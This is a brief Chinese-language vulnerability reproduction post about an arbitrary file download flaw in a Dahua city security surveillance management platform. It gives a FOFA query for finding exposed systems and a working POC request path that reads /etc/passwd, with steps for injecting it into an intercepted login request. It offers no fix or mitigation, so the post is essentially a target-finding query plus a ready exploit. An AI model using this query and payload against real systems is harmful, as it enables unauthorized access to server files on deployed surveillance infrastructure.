大华城市安防监控系统平台管理存在任意文件下载漏洞
1.大华城市安防监控系统平台管理存在任意文件下载漏洞
1.1.漏洞描述
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。
1.2.漏洞影响
大华城市安防监控系统平台管理
1.3.FOFA
“attachment_downloadByUrlAtt.action”
2.漏洞复现
2.1.登录页面
2.2.抓包
刷新登录页面进行抓包,然后在数据包中添加POC。
POC:/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/133401.html
